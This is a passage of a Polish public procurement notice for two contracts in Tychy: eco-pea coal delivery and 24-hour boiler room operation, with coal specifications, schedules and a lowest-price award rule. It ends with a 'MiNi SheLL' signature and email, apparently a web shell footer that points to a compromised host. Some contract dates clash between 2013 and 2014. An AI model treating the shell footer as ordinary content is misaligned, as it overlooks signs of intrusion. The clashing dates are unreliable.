          Zamawiający dopuszcza możliwość dostawy węgla o parametrach technicznych innych, 
          lecz nie gorszych niż podane przez Zamawiającego.
    Dostawa węgla do  kotłowni węglowych winna być realizowana etapami, po uprzednim 
       	 każdorazowym telefonicznym zamówieniu przez upoważnionego pracownika ze strony 
          Zamawiającego. 
          Jednorazowa dostawa węgla nie powinna przekroczyć 10 ton.
          Przewidywany termin pierwszej dostawy:  wrzesień 2014r. 
2)	 Utrzymanie całodobowego ruchu cieplnego w kotłowniach węglowych w budynkach
       mieszkalnych - wielorodzinnych przy ul. Jankowickiej 2 , ul. Jankowickiej 4 i ul Szkolnej 70 
       w Tychach
3)	 Utrzymanie całodobowego ruchu cieplnego w kotłowni gazowej w budynku mieszkalnym -
      wielorodzinnym przy ul. Browarowej 4
4)	Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1/ROM I 
         do SIWZ i do wzoru umowy

Termin realizacji zamówienia:  
1.	Dostawa węgla:  od  16.09.2014 r. ÷ 15.09.2015 r.
2.	Utrzymanie ruchu cieplnego w kotłowniach: 
a) ul. Jankowicka  2  i  ul Szkolna 70   -  od  16.09.2014 r. ÷ 15.05.2015 r. 
b) ul. Jankowicka 4  i ul Browarowa 4  -  od  16.09.2014 r. ÷ 15.09.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.12.10-5, 50.72.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2 -  Dostawa węgla kamiennego energetycznego typu GROSZEK EKO         
      wraz ze świadczeniem usług w zakresie utrzymania całodobowego ruchu cieplnego w 
      kotłowniach węglowych oraz gazowych w nieruchomościach administrowanych przez ROM II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1)	Dostawę 10 ton węgla kamiennego energetycznego typu GROSZEK EKO wraz z 
     transportem do kotłowni węglowej w budynkach przy ul. Nowokościelnej 27.
        Orientacyjne zużycie węgla typu GROSZEK EKO przez kotłownię przez
        okres realizacji zamówienia wynosi 10 ton.
     Wymagane parametry węgla:
         Węgiel kamienny energetyczny typu GROSZEK EKO 31,2 płukany, klasy 26/050/06 
          sortymentu 0223/cc o następujących  parametrach:
         -   granulacja 5 - 20 mm, 
         -   średnie do wysokiej zawartości części lotnych 28%  - 40%,
         -   wilgotność mniejsza niż 15%,
         -   temperatura topnienia popiołu powyżej 1150 stopni C,
         -   zawartość miału do 10% (granulacja ziarna poniżej 4mm).
          Zamawiający dopuszcza możliwość dostawy węgla o parametrach technicznych innych, 
          lecz nie gorszych niż podane przez Zamawiającego.
    Dostawa węgla do  kotłowni winna być realizowana etapami, po uprzednim 
       	 każdorazowym telefonicznym zamówieniu przez upoważnionego pracownika ze strony 
          Zamawiającego. 
          Jednorazowa dostawa węgla nie powinna przekroczyć 5 ton.
          Przewidywany termin pierwszej dostawy:  wrzesień 2014r. 
2)	  Utrzymanie całodobowego ruchu cieplnego w kotłowni węglowej w budynku
       mieszkalnym - wielorodzinnym przy ul. Norwida 44 w Tychach
3)	 Utrzymanie całodobowego ruchu cieplnego w kotłowni gazowej w budynku użyteczności 
       publicznej przy ul. Nowokościelnej 27 w Tychach.
 4) Szczegółowy opis przedmiotu zamówienia został określony w załączniku nr 1/ROM II 
     do SIWZ i do wzoru umowy.

Termin realizacji zamówienia:  
1.	Dostawa węgla             -   od 16.09.2013 r. ÷ 15.09.2014 r.
2.	Utrzymanie ruchu cieplnego w kotłowniach
a)	 ul. Norwida 44            -   od 16.09.2014 r. ÷ 15.05.2015 r. 
b)	 ul. Nowokościelna 27 -   od 16.09.2013 r. ÷ 15.09.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.12.10-5, 50.72.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com